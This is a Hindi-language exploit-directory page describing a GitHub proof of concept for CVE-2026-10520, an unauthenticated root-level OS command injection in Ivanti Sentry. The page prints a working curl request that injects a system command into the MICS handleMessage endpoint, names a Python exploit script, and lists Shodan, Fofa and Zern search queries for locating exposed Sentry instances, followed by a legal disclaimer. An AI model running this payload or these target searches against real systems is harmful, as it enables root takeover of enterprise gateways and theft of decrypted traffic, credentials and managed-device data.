Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-10520 — Ivanti Sentry में OS कमांड इंजेक्शन के माध्यम से रूट-लेवल RCE | Kitploit
उपकरण/GitHubGitHub/error-inside/cve-2026-10520
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा
GitHuberror-inside/cve-2026-10520

CVE-2026-10520

Ivanti Sentry में OS कमांड इंजेक्शन के माध्यम से रूट-लेवल RCE

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-10520

Python CVSS License Educational

Ivanti Sentry (पूर्व में MobileIron Sentry) एक एंटरप्राइज़ सुरक्षा गेटवे है जो मोबाइल उपकरणों और कॉर्पोरेट बैकएंड संसाधनों के बीच ट्रैफ़िक प्रॉक्सी करता है: ईमेल, SharePoint, और आंतरिक वेब अनुप्रयोग। यह मोबाइल डिवाइस प्रबंधन (MDM) नीतियों को लागू करता है, एन्क्रिप्टेड मोबाइल सत्रों को समाप्त करता है, और एंटरप्राइज़ ऐप परिनियोजन के लिए प्रमाणपत्र-आधारित प्रमाणीकरण जारी करता है। Sentry इंस्टेंस आमतौर पर पोर्ट8443 पर इंटरनेट-फेसिंग होते हैं, जो MICS (Mobile Iron Configuration Service) प्रशासन API को उजागर करते हैं।

CVE-2026-10520 एक अनप्रमाणित OS कमांड इंजेक्शन भेद्यता है जो Ivanti Sentry R10.5.2, R10.6.2, और R10.7.1 से पहले के संस्करणों को प्रभावित करती है (CVSSv3.1: 10 क्रिटिकल, CISA KEV में सूचीबद्ध)। दोष MICS API में है endpoint /mics/api/v2/sentry/mics-config/handleMessage, जो URL-एन्कोडेड message POST बॉडी के माध्यम से XML-लिपटे सिस्टम कमांड स्वीकार करता है बिना किसी प्रमाणीकरण या इनपुट सत्यापन के। एक हमलावर जो भेद्य endpoint तक पहुँचता है, root के रूप में मनमाना OS कमांड निष्पादित कर सकता है, होस्ट का पूर्ण नियंत्रण प्राप्त करता है — जिसमें डिक्रिप्टेड एंटरप्राइज़ ट्रैफ़िक, संग्रहीत क्रेडेंशियल, और सभी प्रबंधित मोबाइल-डिवाइस डेटा शामिल हैं।

PoC

root@kitploit:~
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Connection: close" \
  --data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"

उपयोग

root@kitploit:~
python CVE-2026-10520-X7.py
  • Zern : title:"Ivanti System Manager: Sign In"
  • Fofa : body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"
  • Shodan : http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443

संसाधन

  • OpenCVE — Ivanti Sentry में OS कमांड इंजेक्शन के माध्यम से रूट-स्तरीय RCE
  • NIST — CVE-2026-10520 विवरण
  • Ivanti Sentry — आधिकारिक उत्पाद पृष्ठ

अस्वीकरण

यह रिपॉजिटरी और इसकी सामग्री केवल वैध सुरक्षा अनुसंधान, अधिकृत पैठ परीक्षण, शैक्षणिक अध्ययन, और रक्षात्मक उद्देश्यों के लिए प्रदान की गई है। इस सामग्री तक पहुँचने या उपयोग करके, आप पूर्ण जिम्मेदारी स्वीकार करते हैं कि आपकी गतिविधियाँ सभी लागू कानूनों का पालन करती हैं और आपने किसी भी ऐसी प्रणाली का परीक्षण करने या उस पर इन तकनीकों को लागू करने से पहले उचित अधिकार प्राप्त कर लिया है जो आपकी नहीं है।

इस परियोजना के लेखक और अनुरक्षक किसी भी क्षति, कानूनी परिणाम, या इस जानकारी के उपयोग से उत्पन्न दुरुपयोग के लिए कोई दायित्व नहीं मानते हैं। अनधिकृत पहुँच, दुर्भावनापूर्ण गतिविधि, या अवैध उद्देश्यों के लिए कोई भी उपयोग स्पष्ट रूप से निषिद्ध और असमर्थित है।

जिम्मेदारी से उपयोग करें. कानूनी रहें. केवल उसी का परीक्षण करें जिसके आप मालिक हैं या जिसके लिए आपके पास स्पष्ट लिखित अनुमति है।

लेखक

  • ErrorInside // SCT

लाइसेंस

SCT-PL

टूल डाउनलोड करें